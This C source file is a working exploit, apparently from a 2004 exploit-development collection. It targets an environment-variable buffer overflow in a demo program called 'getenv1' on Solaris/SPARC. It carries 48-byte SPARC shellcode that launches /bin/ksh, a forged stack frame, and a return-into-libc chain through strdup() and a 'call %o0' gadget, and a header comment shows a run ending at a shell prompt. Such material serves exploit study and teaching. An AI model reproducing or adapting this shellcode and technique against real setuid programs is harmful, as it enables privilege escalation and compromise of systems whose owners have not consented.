/*
 * $Id: getenv1-ex4.c,v 1.3 2007/01/09 16:03:12 raptor Exp $
 *
 * getenv1-ex4.c - getenv1.c exploit (Solaris/SPARC environ)
 * Copyright (c) 2004 Marco Ivaldi <raptor@0xdeadbeef.info>
 *
 * This exploit applies the advanced return-into-libc technique to an
 * environ-based buffer overflow. Note how we solved the alignment problem
 * and the elite return-to-strdup() technique. See also retlibc*ex*.
 *
 * Compile with: "gcc getenv1-ex4.c -o getenv1-ex4 -lc -ldl".
 *
 * bash-2.05$ uname -a
 * SunOS morgana 5.9 Generic sun4u sparc SUNW,Ultra-5_10
 * bash-2.05$ gcc --version
 * gcc (GCC) 3.2
 * bash-2.05$ ./getenv1-ex4
 * Using SI_PLATFORM       : SUNW,Ultra-5_10 (5.9)
 * Using stack base        : 0xffbffffc
 * Using ff address        : 0xffbffd64
 * Using sc address        : 0xffbffda8
 * Using strdup() address  : 0xff2cefbc
 * Using call %o0 address  : 0xff2d81b0
 * $ 
 *
 * NOTE. This is not going to work on platforms other than sparcv9 (yet).
 */

#include <dlfcn.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <strings.h>
#include <unistd.h>
#include <sys/systeminfo.h>

#define VULN 	"./getenv1"		// the vulnerable program
#define BUFSIZE	512 + 1			// size of the evil buffer
#define FFSIZE	64 + 1			// size of the fake frame
#define DUMMY	0xdeadbeef		// dummy memory address
#define CALL	"\x9f\xc2\x00\x00"	// "call %o0" opcode
#define	ALIGN	1			// return address alignment

/* voodoo macros */
#define	VOODOO32(_,__,___)		{_--;_+=(__+___-1)%4-_%4<0?8-_%4:4-_%4;}
#define	VOODOO64(_,__,___)		{_+=7-(_+(__+___+1)*4+3)%8;}

char sc[] = /* Solaris/SPARC shellcode (48 bytes) */
"\x20\xbf\xff\xff\x20\xbf\xff\xff\x7f\xff\xff\xff\x90\x03\xe0\x20"
"\x92\x02\x20\x10\xc0\x22\x20\x08\xd0\x22\x20\x10\xc0\x22\x20\x14"
"\x82\x10\x20\x0b\x91\xd0\x20\x08/bin/ksh";

/* (ugly) globals */
char	*env[256];
int	env_pos = 0, env_len = 0;

/*
 * set_val(): copy a dword inside a buffer
 */
void set_val(char *buf, int pos, int val)
{
	buf[pos] =	(val & 0xff000000) >> 24;
	buf[pos + 1] =	(val & 0x00ff0000) >> 16;
	buf[pos + 2] =	(val & 0x0000ff00) >> 8;
	buf[pos + 3] =	(val & 0x000000ff);
}

/*
 * add_env(): add a variable to envp and pad if needed
 */
int add_env(char *string)
{
	int 	i;

	/* null termination */
	if (!string) {
		env[env_pos] = NULL;
		return(env_len);
	}

	/* add the variable to envp */
	env[env_pos] = string;
	env_len += strlen(string) + 1;	
	env_pos++;

	/* pad the envp using zeroes */
	if ((strlen(string) + 1) % 4)
		for (i = 0; i < (4 - ((strlen(string)+1)%4)); i++, env_pos++) {
			env[env_pos] = string + strlen(string);
			env_len++;
		}
	
	return(env_len);
}

/*
 * fault(): SIGSEGV handler
 */
void fault()
{
	fprintf(stderr, "sorry, pattern not found\n");
	exit(1);
}

/*
 * check_zero(): check an address for the presence of a 0x0
 */
void check_zero(int addr, char *pattern)
{
	if (!(addr & 0xff) || !(addr & 0xff00) || !(addr & 0xff0000) ||
	    !(addr & 0xff000000)) {
		fprintf(stderr, "the address of %s contains a 0x0!\n", pattern);
		exit(1);
	}
}

/*
 * search(): search for a symbol inside libc
 */
int search(char *sym)
{
	int 	addr;

	/* search for the address of the symbol inside libc */
	if ((addr = (int)dlsym(RTLD_NEXT, sym)) == NULL) {
		fprintf(stderr, "sorry, function %s() not found\n", sym);
		exit(1);
	}

	check_zero(addr - 4, sym);
	return(addr);
}

/*
 * search_str(): search for a string in libc
 */
int search_str(char *pattern, int addr)
{
	/* install SIGSEGV handler and begin search */
	signal(SIGSEGV, fault);

	while (memcmp((void *)addr, pattern, strlen(pattern) + 1))
		addr++;

	/* uninstall SIGSEGV handler and end search */
	signal(SIGSEGV, SIG_DFL);

	check_zero(addr - 8, pattern);
	return(addr);
}

/*
 * main()
 */
int main(int argc, char **argv)
{
	char 	buf[BUFSIZE];
	char	ff[FFSIZE];
	char 	platform[256], release[256];

	int 	ff_addr, shell_addr, offset, i, rel;

	char	*arg[2] = {"AAA", NULL};
	int	arg_len = 4, arg_pos = 1;
	int	plat_len, prog_len;

	/* get the stack base */
	int 	sb = ((int)argv[0] | 0xffff) & 0xfffffffc;

	/* get the address of strdup() in libc */
	int	ret = search("strdup");

	/* get the address of a "call %o0" opcode in libc */
	int	call_addr = search_str(CALL, ret);

	/* get some system information */
	sysinfo(SI_PLATFORM, platform, sizeof(platform) - 1);
	sysinfo(SI_RELEASE, release, sizeof(release) - 1);
	rel = atoi(release + 2);

	/* fill the evil buffer */
	memset(buf, 'A', sizeof(buf));
	buf[sizeof(buf) - 1] = 0x0;

	/* fill the fake frame */
	bzero(ff, sizeof(ff));

	/* 
	 * saved %l registers
	 */
	set_val(ff, i  = 0, DUMMY);		/* %l0 */
	set_val(ff, i += 4, DUMMY);		/* %l1 */
	set_val(ff, i += 4, DUMMY);		/* %l2 */
	set_val(ff, i += 4, DUMMY);		/* %l3 */
	set_val(ff, i += 4, DUMMY);		/* %l4 */
	set_val(ff, i += 4, DUMMY);		/* %l5 */
	set_val(ff, i += 4, DUMMY);		/* %l6 */
	set_val(ff, i += 4, DUMMY);		/* %l7 */

	/* 
	 * saved %i registers
	 */
	set_val(ff, i += 4, 0x42424242);	/* %i0: arg to strdup() */
	set_val(ff, i += 4, DUMMY);		/* %i1 */
	set_val(ff, i += 4, DUMMY);		/* %i2 */
	set_val(ff, i += 4, DUMMY);		/* %i3 */
	set_val(ff, i += 4, DUMMY);		/* %i4 */
	set_val(ff, i += 4, DUMMY);		/* %i5 */
	set_val(ff, i += 4, sb - 1000);		/* %i6: frame pointer */
	set_val(ff, i += 4, call_addr - 8);	/* %i7: return address */

	/* fill the envp, keeping padding */
	shell_addr = add_env(ff);
	add_env(sc);
	add_env(buf);
	add_env(NULL);

	/* calculate the offset to argv[0] (voodoo magic) */
	plat_len = strlen(platform) + 1;
	prog_len = strlen(strrchr(VULN, '/') + 1) + 1;
	offset = arg_len + env_len + plat_len + prog_len;
	if (rel > 7)
		VOODOO64(offset, arg_pos, env_pos)
	else
		VOODOO32(offset, plat_len, prog_len)

	/* calculate the fake frame address (envp[0]) and shell address */
	ff_addr = sb - offset + arg_len;
	shell_addr += ff_addr;

	/* set %i0 */
	set_val(ff, 32, shell_addr);		/* arg to strdup() */

	/* set main()'s %i6 and %i7 */
	i = 332 + ALIGN;
	set_val(buf, i, ff_addr);		/* fake frame address */
	set_val(buf, i += 4, ret - 4);		/* return address in libc */

	/* set the evil env var */
	buf[0] = 'V';
	buf[1] = 'U';
	buf[2] = 'L';
	buf[3] = 'N';
	buf[4] = '=';

	/* print some output */
	fprintf(stderr, "Using SI_PLATFORM\t: %s (%s)\n", platform, release);
	fprintf(stderr, "Using stack base\t: 0x%p\n", sb);
	fprintf(stderr, "Using ff address\t: 0x%p\n", ff_addr);
	fprintf(stderr, "Using sc address\t: 0x%p\n", shell_addr);
	fprintf(stderr, "Using strdup() address\t: 0x%p\n", ret);
	fprintf(stderr, "Using call %%o0 address\t: 0x%p\n", call_addr);

	/* run the vulnerable program */
	execve(VULN, arg, env);
	perror("execve");
}
